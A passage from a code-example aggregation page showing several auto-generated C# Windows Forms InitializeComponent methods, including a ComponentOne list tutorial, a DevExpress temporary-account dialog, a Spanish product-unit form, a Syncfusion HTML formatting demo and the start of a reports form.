     //
     this.menuItem2.Index = 1;
     this.menuItem2.Text  = "to";
     //
     // menuItem3
     //
     this.menuItem3.Index = 2;
     this.menuItem3.Text  = "ComponentOne";
     //
     // button1
     //
     this.button1.Location = new System.Drawing.Point(40, 88);
     this.button1.Name     = "button1";
     this.button1.Size     = new System.Drawing.Size(168, 32);
     this.button1.TabIndex = 1;
     this.button1.Text     = "Limit To List";
     this.button1.Click   += new System.EventHandler(this.button1_Click);
     //
     // label1
     //
     this.label1.Location = new System.Drawing.Point(40, 144);
     this.label1.Name     = "label1";
     this.label1.Size     = new System.Drawing.Size(328, 32);
     this.label1.TabIndex = 2;
     this.label1.Text     = "Try right clicking on the C1Combo to popup the context menu.";
     //
     // oleDbSelectCommand1
     //
     this.oleDbSelectCommand1.CommandText = "SELECT     Composer.*\r\nFROM         Composer";
     this.oleDbSelectCommand1.Connection  = this.oleDbConnection1;
     //
     // oleDbDataAdapter1
     //
     this.oleDbDataAdapter1.SelectCommand = this.oleDbSelectCommand1;
     this.oleDbDataAdapter1.TableMappings.AddRange(new System.Data.Common.DataTableMapping[] {
         new System.Data.Common.DataTableMapping("Table", "Composer", new System.Data.Common.DataColumnMapping[] {
             new System.Data.Common.DataColumnMapping("First", "First"),
             new System.Data.Common.DataColumnMapping("Last", "Last"),
             new System.Data.Common.DataColumnMapping("Country", "Country"),
             new System.Data.Common.DataColumnMapping("Birth", "Birth"),
             new System.Data.Common.DataColumnMapping("Death", "Death")
         })
     });
     //
     // oleDbConnection1
     //
     this.oleDbConnection1.ConnectionString = "Provider=Microsoft.Jet.OLEDB.4.0;Data Source=\"..\\..\\..\\Data\\C1ListDemo.mdb\"";
     //
     // dsComposer1
     //
     this.dsComposer1.DataSetName = "DsComposer";
     //
     // Form1
     //
     this.AutoScaleBaseSize = new System.Drawing.Size(5, 13);
     this.ClientSize        = new System.Drawing.Size(408, 206);
     this.Controls.Add(this.label1);
     this.Controls.Add(this.button1);
     this.Controls.Add(this.c1Combo1);
     this.Name  = "Form1";
     this.Text  = "C1List .Net Tutorial20";
     this.Load += new System.EventHandler(this.Form1_Load);
     ((System.ComponentModel.ISupportInitialize)(this.c1Combo1)).EndInit();
     ((System.ComponentModel.ISupportInitialize)(this.dsComposer1)).EndInit();
     this.ResumeLayout(false);
 }
Example #48
0
 private void InitializeComponent()
 {
     System.ComponentModel.ComponentResourceManager resources = new System.ComponentModel.ComponentResourceManager(typeof(NewTempUser));
     this.panelControl1 = new DevExpress.XtraEditors.PanelControl();
     this.btnCancel     = new DevExpress.XtraEditors.SimpleButton();
     this.btnsave       = new DevExpress.XtraEditors.SimpleButton();
     this.groupControl1 = new DevExpress.XtraEditors.GroupControl();
     this.dateEditend   = new DevExpress.XtraEditors.DateEdit();
     this.labelControl6 = new DevExpress.XtraEditors.LabelControl();
     this.dateEditstart = new DevExpress.XtraEditors.DateEdit();
     this.labelControl5 = new DevExpress.XtraEditors.LabelControl();
     this.txt_Pswd2     = new DevExpress.XtraEditors.TextEdit();
     this.labelControl4 = new DevExpress.XtraEditors.LabelControl();
     this.txt_Pswd      = new DevExpress.XtraEditors.TextEdit();
     this.txt_Name      = new DevExpress.XtraEditors.TextEdit();
     this.txt_ID        = new DevExpress.XtraEditors.TextEdit();
     this.labelControl3 = new DevExpress.XtraEditors.LabelControl();
     this.labelControl2 = new DevExpress.XtraEditors.LabelControl();
     this.labelControl1 = new DevExpress.XtraEditors.LabelControl();
     ((System.ComponentModel.ISupportInitialize)(this.panelControl1)).BeginInit();
     this.panelControl1.SuspendLayout();
     ((System.ComponentModel.ISupportInitialize)(this.groupControl1)).BeginInit();
     this.groupControl1.SuspendLayout();
     ((System.ComponentModel.ISupportInitialize)(this.dateEditend.Properties.CalendarTimeProperties)).BeginInit();
     ((System.ComponentModel.ISupportInitialize)(this.dateEditend.Properties)).BeginInit();
     ((System.ComponentModel.ISupportInitialize)(this.dateEditstart.Properties.CalendarTimeProperties)).BeginInit();
     ((System.ComponentModel.ISupportInitialize)(this.dateEditstart.Properties)).BeginInit();
     ((System.ComponentModel.ISupportInitialize)(this.txt_Pswd2.Properties)).BeginInit();
     ((System.ComponentModel.ISupportInitialize)(this.txt_Pswd.Properties)).BeginInit();
     ((System.ComponentModel.ISupportInitialize)(this.txt_Name.Properties)).BeginInit();
     ((System.ComponentModel.ISupportInitialize)(this.txt_ID.Properties)).BeginInit();
     this.SuspendLayout();
     //
     // panelControl1
     //
     this.panelControl1.Controls.Add(this.btnCancel);
     this.panelControl1.Controls.Add(this.btnsave);
     this.panelControl1.Dock     = System.Windows.Forms.DockStyle.Bottom;
     this.panelControl1.Location = new System.Drawing.Point(0, 155);
     this.panelControl1.Name     = "panelControl1";
     this.panelControl1.Size     = new System.Drawing.Size(369, 33);
     this.panelControl1.TabIndex = 1;
     //
     // btnCancel
     //
     this.btnCancel.DialogResult = System.Windows.Forms.DialogResult.Cancel;
     this.btnCancel.Location     = new System.Drawing.Point(199, 6);
     this.btnCancel.Name         = "btnCancel";
     this.btnCancel.Size         = new System.Drawing.Size(75, 23);
     this.btnCancel.TabIndex     = 1;
     this.btnCancel.Text         = "取消";
     this.btnCancel.Click       += new System.EventHandler(this.btnCancel_Click);
     //
     // btnsave
     //
     this.btnsave.DialogResult = System.Windows.Forms.DialogResult.OK;
     this.btnsave.Location     = new System.Drawing.Point(76, 6);
     this.btnsave.Name         = "btnsave";
     this.btnsave.Size         = new System.Drawing.Size(75, 23);
     this.btnsave.TabIndex     = 0;
     this.btnsave.Text         = "确定";
     this.btnsave.Click       += new System.EventHandler(this.btnsave_Click);
     //
     // groupControl1
     //
     this.groupControl1.Controls.Add(this.dateEditend);
     this.groupControl1.Controls.Add(this.labelControl6);
     this.groupControl1.Controls.Add(this.dateEditstart);
     this.groupControl1.Controls.Add(this.labelControl5);
     this.groupControl1.Controls.Add(this.txt_Pswd2);
     this.groupControl1.Controls.Add(this.labelControl4);
     this.groupControl1.Controls.Add(this.txt_Pswd);
     this.groupControl1.Controls.Add(this.txt_Name);
     this.groupControl1.Controls.Add(this.txt_ID);
     this.groupControl1.Controls.Add(this.labelControl3);
     this.groupControl1.Controls.Add(this.labelControl2);
     this.groupControl1.Controls.Add(this.labelControl1);
     this.groupControl1.Dock     = System.Windows.Forms.DockStyle.Fill;
     this.groupControl1.Location = new System.Drawing.Point(0, 0);
     this.groupControl1.Name     = "groupControl1";
     this.groupControl1.Size     = new System.Drawing.Size(369, 155);
     this.groupControl1.TabIndex = 2;
     //
     // dateEditend
     //
     this.dateEditend.EditValue = null;
     this.dateEditend.Location  = new System.Drawing.Point(257, 116);
     this.dateEditend.Name      = "dateEditend";
     this.dateEditend.Properties.Buttons.AddRange(new DevExpress.XtraEditors.Controls.EditorButton[] {
         new DevExpress.XtraEditors.Controls.EditorButton(DevExpress.XtraEditors.Controls.ButtonPredefines.Combo)
     });
     this.dateEditend.Properties.CalendarTimeProperties.Buttons.AddRange(new DevExpress.XtraEditors.Controls.EditorButton[] {
         new DevExpress.XtraEditors.Controls.EditorButton()
     });
     this.dateEditend.Size              = new System.Drawing.Size(100, 20);
     this.dateEditend.TabIndex          = 11;
     this.dateEditend.EditValueChanged += new System.EventHandler(this.dateEditend_EditValueChanged);
     //
     // labelControl6
     //
     this.labelControl6.Location = new System.Drawing.Point(199, 119);
     this.labelControl6.Name     = "labelControl6";
     this.labelControl6.Size     = new System.Drawing.Size(12, 14);
     this.labelControl6.TabIndex = 10;
     this.labelControl6.Text     = "---";
     //
     // dateEditstart
     //
     this.dateEditstart.EditValue = null;
     this.dateEditstart.Location  = new System.Drawing.Point(76, 116);
     this.dateEditstart.Name      = "dateEditstart";
     this.dateEditstart.Properties.Buttons.AddRange(new DevExpress.XtraEditors.Controls.EditorButton[] {
         new DevExpress.XtraEditors.Controls.EditorButton(DevExpress.XtraEditors.Controls.ButtonPredefines.Combo)
     });
     this.dateEditstart.Properties.CalendarTimeProperties.Buttons.AddRange(new DevExpress.XtraEditors.Controls.EditorButton[] {
         new DevExpress.XtraEditors.Controls.EditorButton()
     });
     this.dateEditstart.Size     = new System.Drawing.Size(100, 20);
     this.dateEditstart.TabIndex = 9;
     //
     // labelControl5
     //
     this.labelControl5.Location = new System.Drawing.Point(13, 123);
     this.labelControl5.Name     = "labelControl5";
     this.labelControl5.Size     = new System.Drawing.Size(24, 14);
     this.labelControl5.TabIndex = 8;
     this.labelControl5.Text     = "期限";
     //
     // txt_Pswd2
     //
     this.txt_Pswd2.Location = new System.Drawing.Point(257, 78);
     this.txt_Pswd2.Name     = "txt_Pswd2";
     this.txt_Pswd2.Properties.PasswordChar = '*';
     this.txt_Pswd2.Size              = new System.Drawing.Size(100, 20);
     this.txt_Pswd2.TabIndex          = 7;
     this.txt_Pswd2.EditValueChanged += new System.EventHandler(this.txt_Pswd2_EditValueChanged);
     //
     // labelControl4
     //
     this.labelControl4.Location = new System.Drawing.Point(199, 81);
     this.labelControl4.Name     = "labelControl4";
     this.labelControl4.Size     = new System.Drawing.Size(48, 14);
     this.labelControl4.TabIndex = 6;
     this.labelControl4.Text     = "重复密码";
     //
     // txt_Pswd
     //
     this.txt_Pswd.Location = new System.Drawing.Point(76, 81);
     this.txt_Pswd.Name     = "txt_Pswd";
     this.txt_Pswd.Properties.PasswordChar = '*';
     this.txt_Pswd.Size     = new System.Drawing.Size(100, 20);
     this.txt_Pswd.TabIndex = 5;
     //
     // txt_Name
     //
     this.txt_Name.Location = new System.Drawing.Point(257, 36);
     this.txt_Name.Name     = "txt_Name";
     this.txt_Name.Size     = new System.Drawing.Size(100, 20);
     this.txt_Name.TabIndex = 4;
     //
     // txt_ID
     //
     this.txt_ID.Location            = new System.Drawing.Point(76, 36);
     this.txt_ID.Name                = "txt_ID";
     this.txt_ID.Properties.ReadOnly = true;
     this.txt_ID.Size                = new System.Drawing.Size(100, 20);
     this.txt_ID.TabIndex            = 3;
     //
     // labelControl3
     //
     this.labelControl3.Location = new System.Drawing.Point(13, 81);
     this.labelControl3.Name     = "labelControl3";
     this.labelControl3.Size     = new System.Drawing.Size(24, 14);
     this.labelControl3.TabIndex = 2;
     this.labelControl3.Text     = "密码";
     //
     // labelControl2
     //
     this.labelControl2.Location = new System.Drawing.Point(199, 39);
     this.labelControl2.Name     = "labelControl2";
     this.labelControl2.Size     = new System.Drawing.Size(24, 14);
     this.labelControl2.TabIndex = 1;
     this.labelControl2.Text     = "姓名";
     //
     // labelControl1
     //
     this.labelControl1.Location = new System.Drawing.Point(13, 39);
     this.labelControl1.Name     = "labelControl1";
     this.labelControl1.Size     = new System.Drawing.Size(48, 14);
     this.labelControl1.TabIndex = 0;
     this.labelControl1.Text     = "临时工号";
     //
     // NewTempUser
     //
     this.AutoScaleDimensions = new System.Drawing.SizeF(6F, 12F);
     this.AutoScaleMode       = System.Windows.Forms.AutoScaleMode.Font;
     this.ClientSize          = new System.Drawing.Size(369, 188);
     this.Controls.Add(this.groupControl1);
     this.Controls.Add(this.panelControl1);
     this.Icon          = ((System.Drawing.Icon)(resources.GetObject("$this.Icon")));
     this.Name          = "NewTempUser";
     this.ShowIcon      = false;
     this.ShowInTaskbar = false;
     this.StartPosition = System.Windows.Forms.FormStartPosition.CenterScreen;
     this.Text          = "临时账号授权";
     this.Load         += new System.EventHandler(this.NewTempUser_Load);
     ((System.ComponentModel.ISupportInitialize)(this.panelControl1)).EndInit();
     this.panelControl1.ResumeLayout(false);
     ((System.ComponentModel.ISupportInitialize)(this.groupControl1)).EndInit();
     this.groupControl1.ResumeLayout(false);
     this.groupControl1.PerformLayout();
     ((System.ComponentModel.ISupportInitialize)(this.dateEditend.Properties.CalendarTimeProperties)).EndInit();
     ((System.ComponentModel.ISupportInitialize)(this.dateEditend.Properties)).EndInit();
     ((System.ComponentModel.ISupportInitialize)(this.dateEditstart.Properties.CalendarTimeProperties)).EndInit();
     ((System.ComponentModel.ISupportInitialize)(this.dateEditstart.Properties)).EndInit();
     ((System.ComponentModel.ISupportInitialize)(this.txt_Pswd2.Properties)).EndInit();
     ((System.ComponentModel.ISupportInitialize)(this.txt_Pswd.Properties)).EndInit();
     ((System.ComponentModel.ISupportInitialize)(this.txt_Name.Properties)).EndInit();
     ((System.ComponentModel.ISupportInitialize)(this.txt_ID.Properties)).EndInit();
     this.ResumeLayout(false);
 }
Example #49
0
 /// <summary>
 /// This method is required for Windows Forms designer support.
 /// Do not change the method contents inside the source code editor. The Forms designer might
 /// not be able to load this method if it was changed manually.
 /// </summary>
 private void InitializeComponent()
 {
     System.ComponentModel.ComponentResourceManager resources = new System.ComponentModel.ComponentResourceManager(typeof(FrmUnidadComercial));
     this.statusStrip1   = new System.Windows.Forms.StatusStrip();
     this.lblInfo        = new System.Windows.Forms.ToolStripStatusLabel();
     this.label1         = new System.Windows.Forms.Label();
     this.txtCodigo      = new System.Windows.Forms.TextBox();
     this.label2         = new System.Windows.Forms.Label();
     this.txtDescripcion = new System.Windows.Forms.TextBox();
     this.btnCerrar      = new System.Windows.Forms.Button();
     this.btnGuardar     = new System.Windows.Forms.Button();
     this.statusStrip1.SuspendLayout();
     this.SuspendLayout();
     //
     // statusStrip1
     //
     this.statusStrip1.Items.AddRange(new System.Windows.Forms.ToolStripItem[] {
         this.lblInfo
     });
     this.statusStrip1.Location = new System.Drawing.Point(0, 96);
     this.statusStrip1.Name     = "statusStrip1";
     this.statusStrip1.Size     = new System.Drawing.Size(348, 22);
     this.statusStrip1.TabIndex = 0;
     this.statusStrip1.Text     = "statusStrip1";
     //
     // lblInfo
     //
     this.lblInfo.Name = "lblInfo";
     this.lblInfo.Size = new System.Drawing.Size(0, 17);
     //
     // label1
     //
     this.label1.AutoSize = true;
     this.label1.Font     = new System.Drawing.Font("Microsoft Sans Serif", 8.25F, System.Drawing.FontStyle.Bold, System.Drawing.GraphicsUnit.Point, ((byte)(0)));
     this.label1.Location = new System.Drawing.Point(15, 12);
     this.label1.Name     = "label1";
     this.label1.Size     = new System.Drawing.Size(55, 13);
     this.label1.TabIndex = 2;
     this.label1.Text     = "Codigo*:";
     //
     // txtCodigo
     //
     this.txtCodigo.Location = new System.Drawing.Point(99, 9);
     this.txtCodigo.Name     = "txtCodigo";
     this.txtCodigo.Size     = new System.Drawing.Size(100, 20);
     this.txtCodigo.TabIndex = 3;
     //
     // label2
     //
     this.label2.AutoSize = true;
     this.label2.Font     = new System.Drawing.Font("Microsoft Sans Serif", 8.25F, System.Drawing.FontStyle.Bold, System.Drawing.GraphicsUnit.Point, ((byte)(0)));
     this.label2.Location = new System.Drawing.Point(15, 39);
     this.label2.Name     = "label2";
     this.label2.Size     = new System.Drawing.Size(83, 13);
     this.label2.TabIndex = 4;
     this.label2.Text     = "Descripción*:";
     //
     // txtDescripcion
     //
     this.txtDescripcion.Location = new System.Drawing.Point(99, 36);
     this.txtDescripcion.Name     = "txtDescripcion";
     this.txtDescripcion.Size     = new System.Drawing.Size(238, 20);
     this.txtDescripcion.TabIndex = 5;
     //
     // btnCerrar
     //
     this.btnCerrar.DialogResult            = System.Windows.Forms.DialogResult.Cancel;
     this.btnCerrar.Image                   = ((System.Drawing.Image)(resources.GetObject("btnCerrar.Image")));
     this.btnCerrar.ImageAlign              = System.Drawing.ContentAlignment.MiddleLeft;
     this.btnCerrar.Location                = new System.Drawing.Point(244, 62);
     this.btnCerrar.Name                    = "btnCerrar";
     this.btnCerrar.Size                    = new System.Drawing.Size(92, 28);
     this.btnCerrar.TabIndex                = 9;
     this.btnCerrar.Text                    = "&Cerrar";
     this.btnCerrar.UseVisualStyleBackColor = true;
     //
     // btnGuardar
     //
     this.btnGuardar.Image      = ((System.Drawing.Image)(resources.GetObject("btnGuardar.Image")));
     this.btnGuardar.ImageAlign = System.Drawing.ContentAlignment.MiddleLeft;
     this.btnGuardar.Location   = new System.Drawing.Point(151, 62);
     this.btnGuardar.Name       = "btnGuardar";
     this.btnGuardar.Size       = new System.Drawing.Size(92, 28);
     this.btnGuardar.TabIndex   = 10;
     this.btnGuardar.Text       = "&Guardar";
     this.btnGuardar.UseVisualStyleBackColor = true;
     this.btnGuardar.Click += new System.EventHandler(this.BtnGuardarClick);
     //
     // FrmUnidadComercial
     //
     this.AutoScaleDimensions = new System.Drawing.SizeF(6F, 13F);
     this.AutoScaleMode       = System.Windows.Forms.AutoScaleMode.Font;
     this.ClientSize          = new System.Drawing.Size(348, 118);
     this.Controls.Add(this.btnCerrar);
     this.Controls.Add(this.btnGuardar);
     this.Controls.Add(this.txtDescripcion);
     this.Controls.Add(this.label2);
     this.Controls.Add(this.txtCodigo);
     this.Controls.Add(this.label1);
     this.Controls.Add(this.statusStrip1);
     this.FormBorderStyle = System.Windows.Forms.FormBorderStyle.FixedDialog;
     this.Name            = "FrmUnidadComercial";
     this.StartPosition   = System.Windows.Forms.FormStartPosition.CenterScreen;
     this.Text            = "FrmUnidadComercial";
     this.Load           += new System.EventHandler(this.FrmUnidadMedida_Load);
     this.statusStrip1.ResumeLayout(false);
     this.statusStrip1.PerformLayout();
     this.ResumeLayout(false);
     this.PerformLayout();
 }
Example #50
0
		/// <summary>
		/// Required method for Designer support - do not modify
		/// the contents of this method with the code editor.
		/// </summary>
		private void InitializeComponent()
		{
            System.ComponentModel.ComponentResourceManager resources = new System.ComponentModel.ComponentResourceManager(typeof(Form1));
            this.htmluiControl1 = new Syncfusion.Windows.Forms.HTMLUI.HTMLUIControl();
            this.panel1 = new System.Windows.Forms.Panel();
            this.panel3 = new System.Windows.Forms.Panel();
            this.panel4 = new System.Windows.Forms.Panel();
            this.label2 = new System.Windows.Forms.Label();
            this.radioButton2 = new Syncfusion.Windows.Forms.Tools.RadioButtonAdv();
            this.radioButton1 = new Syncfusion.Windows.Forms.Tools.RadioButtonAdv();
            this.panel2 = new System.Windows.Forms.Panel();
            this.label4 = new System.Windows.Forms.Label();
            this.label3 = new System.Windows.Forms.Label();
            this.label1 = new System.Windows.Forms.Label();
            this.gradientPanel1 = new Syncfusion.Windows.Forms.Tools.GradientPanel();
            ((System.ComponentModel.ISupportInitialize)(this.htmluiControl1)).BeginInit();
            this.panel1.SuspendLayout();
            this.panel3.SuspendLayout();
            this.panel4.SuspendLayout();
            ((System.ComponentModel.ISupportInitialize)(this.radioButton2)).BeginInit();
            ((System.ComponentModel.ISupportInitialize)(this.radioButton1)).BeginInit();
            this.panel2.SuspendLayout();
            ((System.ComponentModel.ISupportInitialize)(this.gradientPanel1)).BeginInit();
            this.gradientPanel1.SuspendLayout();
            this.SuspendLayout();
            // 
            // htmluiControl1
            // 
            this.htmluiControl1.AutoScroll = true;
            this.htmluiControl1.AutoScrollMinSize = new System.Drawing.Size(567, 340);
            this.htmluiControl1.BackColor = System.Drawing.Color.White;
            this.htmluiControl1.DefaultFormat.BackgroundColor = System.Drawing.SystemColors.Control;
            this.htmluiControl1.DefaultFormat.ForeColor = System.Drawing.SystemColors.ControlText;
            this.htmluiControl1.Dock = System.Windows.Forms.DockStyle.Fill;
            this.htmluiControl1.Location = new System.Drawing.Point(0, 0);
            this.htmluiControl1.Name = "htmluiControl1";
            this.htmluiControl1.Size = new System.Drawing.Size(584, 355);
            this.htmluiControl1.TabIndex = 0;
            this.htmluiControl1.Text = resources.GetString("htmluiControl1.Text");
            this.htmluiControl1.LoadFinished += new System.EventHandler(this.htmluiControl1_LoadFinished);
            // 
            // panel1
            // 
            this.panel1.BackColor = System.Drawing.Color.White;
            this.panel1.BorderStyle = System.Windows.Forms.BorderStyle.FixedSingle;
            this.panel1.Controls.Add(this.panel3);
            this.panel1.Dock = System.Windows.Forms.DockStyle.Left;
            this.panel1.Location = new System.Drawing.Point(10, 10);
            this.panel1.Name = "panel1";
            this.panel1.Size = new System.Drawing.Size(138, 475);
            this.panel1.TabIndex = 1;
            // 
            // panel3
            // 
            this.panel3.BackColor = System.Drawing.Color.Silver;
            this.panel3.Controls.Add(this.panel4);
            this.panel3.Location = new System.Drawing.Point(8, 24);
            this.panel3.Name = "panel3";
            this.panel3.Size = new System.Drawing.Size(120, 136);
            this.panel3.TabIndex = 2;
            // 
            // panel4
            // 
            this.panel4.BackColor = System.Drawing.Color.White;
            this.panel4.Controls.Add(this.label2);
            this.panel4.Controls.Add(this.radioButton2);
            this.panel4.Controls.Add(this.radioButton1);
            this.panel4.Location = new System.Drawing.Point(2, 2);
            this.panel4.Name = "panel4";
            this.panel4.Size = new System.Drawing.Size(116, 132);
            this.panel4.TabIndex = 5;
            // 
            // label2
            // 
            this.label2.Anchor = ((System.Windows.Forms.AnchorStyles)(((System.Windows.Forms.AnchorStyles.Top | System.Windows.Forms.AnchorStyles.Left) 
            | System.Windows.Forms.AnchorStyles.Right)));
            this.label2.BackColor = System.Drawing.Color.White;
            this.label2.Font = new System.Drawing.Font("Microsoft Sans Serif", 9.75F, System.Drawing.FontStyle.Bold, System.Drawing.GraphicsUnit.Point, ((byte)(0)));
            this.label2.ForeColor = System.Drawing.Color.Black;
            this.label2.Location = new System.Drawing.Point(-2, 0);
            this.label2.Name = "label2";
            this.label2.Size = new System.Drawing.Size(120, 24);
            this.label2.TabIndex = 6;
            this.label2.Text = "Format style";
            this.label2.TextAlign = System.Drawing.ContentAlignment.MiddleCenter;
            // 
            // radioButton2
            // 
            this.radioButton2.Anchor = ((System.Windows.Forms.AnchorStyles)((System.Windows.Forms.AnchorStyles.Left | System.Windows.Forms.AnchorStyles.Right)));
            this.radioButton2.DrawFocusRectangle = false;
            this.radioButton2.Font = new System.Drawing.Font("Arial", 9.75F, System.Drawing.FontStyle.Regular, System.Drawing.GraphicsUnit.Point, ((byte)(0)));
            this.radioButton2.ForeColor = System.Drawing.Color.Green;
            this.radioButton2.Location = new System.Drawing.Point(4, 74);
            this.radioButton2.MetroColor = System.Drawing.Color.Silver;
            this.radioButton2.Name = "radioButton2";
            this.radioButton2.Size = new System.Drawing.Size(108, 40);
            this.radioButton2.Style = Syncfusion.Windows.Forms.Tools.RadioButtonAdvStyle.Metro;
            this.radioButton2.TabIndex = 5;
            this.radioButton2.TabStop = false;
            this.radioButton2.Text = "Format green";
            this.radioButton2.ThemesEnabled = false;
            // 
            // radioButton1
            // 
            this.radioButton1.Anchor = ((System.Windows.Forms.AnchorStyles)((System.Windows.Forms.AnchorStyles.Left | System.Windows.Forms.AnchorStyles.Right)));
            this.radioButton1.Checked = true;
            this.radioButton1.DrawFocusRectangle = false;
            this.radioButton1.Font = new System.Drawing.Font("Arial", 9.75F, System.Drawing.FontStyle.Regular, System.Drawing.GraphicsUnit.Point, ((byte)(0)));
            this.radioButton1.ForeColor = System.Drawing.Color.Orange;
            this.radioButton1.Location = new System.Drawing.Point(4, 34);
            this.radioButton1.MetroColor = System.Drawing.Color.Silver;
            this.radioButton1.Name = "radioButton1";
            this.radioButton1.Size = new System.Drawing.Size(108, 42);
            this.radioButton1.Style = Syncfusion.Windows.Forms.Tools.RadioButtonAdvStyle.Metro;
            this.radioButton1.TabIndex = 4;
            this.radioButton1.Text = "Format orange";
            this.radioButton1.ThemesEnabled = false;
            // 
            // panel2
            // 
            this.panel2.Anchor = ((System.Windows.Forms.AnchorStyles)(((System.Windows.Forms.AnchorStyles.Top | System.Windows.Forms.AnchorStyles.Left) 
            | System.Windows.Forms.AnchorStyles.Right)));
            this.panel2.BackColor = System.Drawing.Color.White;
            this.panel2.Controls.Add(this.label4);
            this.panel2.Controls.Add(this.label3);
            this.panel2.Controls.Add(this.label1);
            this.panel2.Location = new System.Drawing.Point(149, 10);
            this.panel2.Name = "panel2";
            this.panel2.Size = new System.Drawing.Size(586, 112);
            this.panel2.TabIndex = 2;
            // 
            // label4
            // 
            this.label4.AutoSize = true;
            this.label4.Font = new System.Drawing.Font("Microsoft Sans Serif", 9F, System.Drawing.FontStyle.Bold, System.Drawing.GraphicsUnit.Point, ((byte)(0)));
            this.label4.ForeColor = System.Drawing.Color.Black;
            this.label4.Location = new System.Drawing.Point(8, 88);
            this.label4.Name = "label4";
            this.label4.Size = new System.Drawing.Size(105, 15);
            this.label4.TabIndex = 5;
            this.label4.Text = "HTMLUI Output";
            // 
            // label3
            // 
            this.label3.AutoSize = true;
            this.label3.Font = new System.Drawing.Font("Microsoft Sans Serif", 9F, System.Drawing.FontStyle.Bold, System.Drawing.GraphicsUnit.Point, ((byte)(0)));
            this.label3.ForeColor = System.Drawing.Color.Black;
            this.label3.Location = new System.Drawing.Point(8, 8);
            this.label3.Name = "label3";
            this.label3.Size = new System.Drawing.Size(73, 15);
            this.label3.TabIndex = 4;
            this.label3.Text = "Style code";
            // 
            // label1
            // 
            this.label1.Anchor = ((System.Windows.Forms.AnchorStyles)(((System.Windows.Forms.AnchorStyles.Top | System.Windows.Forms.AnchorStyles.Left) 
            | System.Windows.Forms.AnchorStyles.Right)));
            this.label1.BackColor = System.Drawing.Color.White;
            this.label1.BorderStyle = System.Windows.Forms.BorderStyle.FixedSingle;
            this.label1.FlatStyle = System.Windows.Forms.FlatStyle.Flat;
            this.label1.Font = new System.Drawing.Font("Tahoma", 9.75F, System.Drawing.FontStyle.Regular, System.Drawing.GraphicsUnit.Point, ((byte)(0)));
            this.label1.ForeColor = System.Drawing.Color.Maroon;
            this.label1.Location = new System.Drawing.Point(16, 32);
            this.label1.Name = "label1";
            this.label1.Size = new System.Drawing.Size(562, 48);
            this.label1.TabIndex = 3;
            this.label1.TextAlign = System.Drawing.ContentAlignment.MiddleCenter;
            // 
            // gradientPanel1
            // 
            this.gradientPanel1.Anchor = ((System.Windows.Forms.AnchorStyles)((((System.Windows.Forms.AnchorStyles.Top | System.Windows.Forms.AnchorStyles.Bottom) 
            | System.Windows.Forms.AnchorStyles.Left) 
            | System.Windows.Forms.AnchorStyles.Right)));
            this.gradientPanel1.BorderStyle = System.Windows.Forms.BorderStyle.FixedSingle;
            this.gradientPanel1.Controls.Add(this.htmluiControl1);
            this.gradientPanel1.Location = new System.Drawing.Point(149, 128);
            this.gradientPanel1.Name = "gradientPanel1";
            this.gradientPanel1.Size = new System.Drawing.Size(586, 357);
            this.gradientPanel1.TabIndex = 3;
            // 
            // Form1
            // 
            this.AutoScaleBaseSize = new System.Drawing.Size(5, 15);
            this.BorderColor = System.Drawing.Color.FromArgb(((int)(((byte)(27)))), ((int)(((byte)(161)))), ((int)(((byte)(226)))));
            this.CaptionAlign = System.Windows.Forms.HorizontalAlignment.Center;
            this.ClientSize = new System.Drawing.Size(745, 495);
            this.Controls.Add(this.gradientPanel1);
            this.Controls.Add(this.panel2);
            this.Controls.Add(this.panel1);
            this.DropShadow = true;
            this.Font = new System.Drawing.Font("Segoe UI", 8.25F, System.Drawing.FontStyle.Regular, System.Drawing.GraphicsUnit.Point, ((byte)(0)));
            this.Icon = ((System.Drawing.Icon)(resources.GetObject("$this.Icon")));
            this.IconAlign = System.Windows.Forms.HorizontalAlignment.Left;
            this.IconTextRelation = System.Windows.Forms.LeftRightAlignment.Left;
            this.MetroColor = System.Drawing.Color.White;
            this.MinimumSize = new System.Drawing.Size(757, 531);
            this.Name = "Form1";
            this.Padding = new System.Windows.Forms.Padding(10);
            this.StartPosition = System.Windows.Forms.FormStartPosition.CenterScreen;
            this.Text = "Formatting Demo";
            this.Load += new System.EventHandler(this.Form1_Load);
            ((System.ComponentModel.ISupportInitialize)(this.htmluiControl1)).EndInit();
            this.panel1.ResumeLayout(false);
            this.panel3.ResumeLayout(false);
            this.panel4.ResumeLayout(false);
            ((System.ComponentModel.ISupportInitialize)(this.radioButton2)).EndInit();
            ((System.ComponentModel.ISupportInitialize)(this.radioButton1)).EndInit();
            this.panel2.ResumeLayout(false);
            this.panel2.PerformLayout();
            ((System.ComponentModel.ISupportInitialize)(this.gradientPanel1)).EndInit();
            this.gradientPanel1.ResumeLayout(false);
            this.ResumeLayout(false);

		}
 /// <summary>
 /// Required method for Designer support - do not modify
 /// the contents of this method with the code editor.
 /// </summary>
 private void InitializeComponent()
 {
     System.ComponentModel.ComponentResourceManager resources = new System.ComponentModel.ComponentResourceManager(typeof(Reports_Form));
     this.mainLabel = new System.Windows.Forms.Label();
     this.label2    = new System.Windows.Forms.Label();
     this.pendingOnlineActivationLinkLabel = new System.Windows.Forms.LinkLabel();
     this.linkLabel4                    = new System.Windows.Forms.LinkLabel();
     this.panel1                        = new System.Windows.Forms.Panel();
     this.customReportLinkLabel         = new System.Windows.Forms.LinkLabel();
     this.aggregationSpaceUsedLinkLabel = new System.Windows.Forms.LinkLabel();
     this.exitButton                    = new SobekCM.Management_Tool.Round_Button();
     this.trackingBoxLinkLabel          = new System.Windows.Forms.LinkLabel();
     this.panel1.SuspendLayout();
     this.SuspendLayout();
     //
     // mainLabel
     //
     this.mainLabel.Anchor = ((System.Windows.Forms.AnchorStyles)(((System.Windows.Forms.AnchorStyles.Top | System.Windows.Forms.AnchorStyles.Left)
                                                                   | System.Windows.Forms.AnchorStyles.Right)));
     this.mainLabel.BackColor = System.Drawing.Color.Transparent;
     this.mainLabel.Font      = new System.Drawing.Font("Tahoma", 18F, System.Drawing.FontStyle.Bold, System.Drawing.GraphicsUnit.Point, ((byte)(0)));
     this.mainLabel.ForeColor = System.Drawing.Color.MediumBlue;
     this.mainLabel.Location  = new System.Drawing.Point(16, 9);
     this.mainLabel.Name      = "mainLabel";
     this.mainLabel.Size      = new System.Drawing.Size(435, 32);
     this.mainLabel.TabIndex  = 2;
     this.mainLabel.Text      = "Available Reports";
     this.mainLabel.TextAlign = System.Drawing.ContentAlignment.MiddleCenter;
     //
     // label2
     //
     this.label2.AutoSize = true;
     this.label2.Font     = new System.Drawing.Font("Tahoma", 12F, System.Drawing.FontStyle.Regular, System.Drawing.GraphicsUnit.Point, ((byte)(0)));
     this.label2.Location = new System.Drawing.Point(52, 37);
     this.label2.Name     = "label2";
